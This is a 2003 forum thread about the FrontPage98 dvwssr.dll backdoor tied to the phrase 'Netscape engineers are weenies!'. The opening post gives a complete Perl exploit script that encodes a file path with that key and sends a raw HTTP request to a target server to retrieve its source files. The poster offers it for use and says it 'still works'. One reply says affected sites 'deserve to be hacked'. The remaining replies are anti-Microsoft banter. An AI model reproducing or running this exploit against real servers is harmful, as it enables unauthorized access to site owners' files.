Author Topic: FrontPage98 BackDoor  (Read 984 times)

ChakanTGM

  • Member
  • **
  • Posts: 63
  • Kudos: 0
    • http://crackice.cjb.net
FrontPage98 BackDoor
« on: 8 April 2003, 20:51 »
"Microsoft said its engineers included a secret back door including the phrase "Netscape engineers are weenies!" in Web site authoring software that could allow hackers to gain unauthorized access to potentially thousands of Web sites . . . "

http://news.com.com/2100-1001-239273.html?legacy=cnet

This, my friends, is why open source shall rule the day. Microsoft has been putting backdoors in thier software for ages. They just got caught this time.

Here's how to exploit this vulnerabiliy:

 
quote:

#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host /file/to/retrieve/source
#
use Socket;


$ip=$ARGV[0];
$file=$ARGV[1];


print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
print sendraw($url);


sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
#
#


my $key="Netscape engineers are weenies!";


#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
 @letts=split(//,$from);
 foreach $lett (@letts){
  $fv=index $slide, $lett;
  $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
  $kv=index $slide, substr $key, $kc, 1;
  if($kv>=0 && $fv>=0){
   $tmp= $kv - $fv;
   if($tmp <0){$tmp +=62;}
   $to.=substr $slide, $tmp,1; } else {
   $to.=$lett;}
  if(++$kc >= length($key)){ $kc=0;}
 }return $to;}


sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S); $|=1;
                print $pstr; my @in=<S>;
                select(STDOUT); close(S);
                return @in;
        } else { die("Can't connect...\n"); }}

 
crackice.cjb.net

ChakanTGM

  • Member
  • **
  • Posts: 63
  • Kudos: 0
    • http://crackice.cjb.net
FrontPage98 BackDoor
« Reply #1 on: 8 April 2003, 20:59 »
By the way, I know the story is outdated by about three years. But it is still a good story, and the exploit still works.
crackice.cjb.net

Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
FrontPage98 BackDoor
« Reply #2 on: 8 April 2003, 21:09 »
it still works 3 years later? open source software cannot get better advertising than that.
visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism

X123

  • Member
  • **
  • Posts: 49
  • Kudos: 0
    • http://z14592.cjb.net
FrontPage98 BackDoor
« Reply #3 on: 8 April 2003, 21:25 »
If someone has a site with front page extensions then they deserve to be hacked.

Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
FrontPage98 BackDoor
« Reply #4 on: 8 April 2003, 21:36 »
backdoor extensions (insert puerile snigger here)
visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism

Pissed_Macman

  • VIP
  • Member
  • ***
  • Posts: 2,499
  • Kudos: 0
    • http://www.macrevolution.tk
FrontPage98 BackDoor
« Reply #5 on: 9 April 2003, 16:29 »
God, no wonder Microsoft programs suck. The designers are busy making easter eggs and back doors.

Refalm

  • Administrator
  • Member
  • ***
  • Posts: 5,183
  • Kudos: 704
  • Sjembek!
    • RADIOKNOP
FrontPage98 BackDoor
« Reply #6 on: 9 April 2003, 22:45 »
quote:
Microsoft Corperation: Netscape engineers are weenies!


At least they have the guts to release the source code of their program to anyone. When are you wuzzies going to do that?

jtpenrod

  • VIP
  • Member
  • ***
  • Posts: 675
  • Kudos: 105
FrontPage98 BackDoor
« Reply #7 on: 10 April 2003, 11:55 »
quote:
God, no wonder Microsoft programs suck. The designers are busy making easter eggs and back doors.
And let's not forget being too damn lazy/careless/indifferent to validate data before it goes into buffers.   :rolleyes:  

Then, again, what can you expect when the vast majority of your coders are "perma-temps" with all the long hours and responsibilities of full-time career positions with none of the pay and benefits of same?   :D  
_______________________________________
Live Free or Die: Linux

Their fundamental design flaws are completely concealed by their superficial design flaws.
Live Free or Die: Linux
If software can be free, why can't dolphins?

theangelofdeath69

  • Member
  • **
  • Posts: 156
  • Kudos: 0
    • http://www.kaltemartech.com/
FrontPage98 BackDoor
« Reply #8 on: 28 April 2003, 13:35 »
What, only one back door?
Specifications are for the weak and timid!
You question the worthiness of my code? I should kill you where you stand!
Indentation?! - I will show you how to indent when I indent your skull!
What is this talk of 'release'? Klingons do not make software 'releases'. Our software 'escapes' leaving a bloody trail of designers and quality assurance people in its wake.
Klingon function calls do not have 'parameters' - they have 'arguments' - and they ALWAYS WIN THEM.
Debugging? Klingons do not debug. Our software does not coddle the weak.
A TRUE Klingon Warrior does not comment on his code!
Klingon software does NOT have BUGS. It has FEATURES, and those features are too sophisticated for a Romulan pig like you to understand.
You cannot truly appreciate Dilbert unless you've read it in the original Klingon.
Our users will know fear and cower before our software! Ship it! Ship it and let them flee like the dogs they are!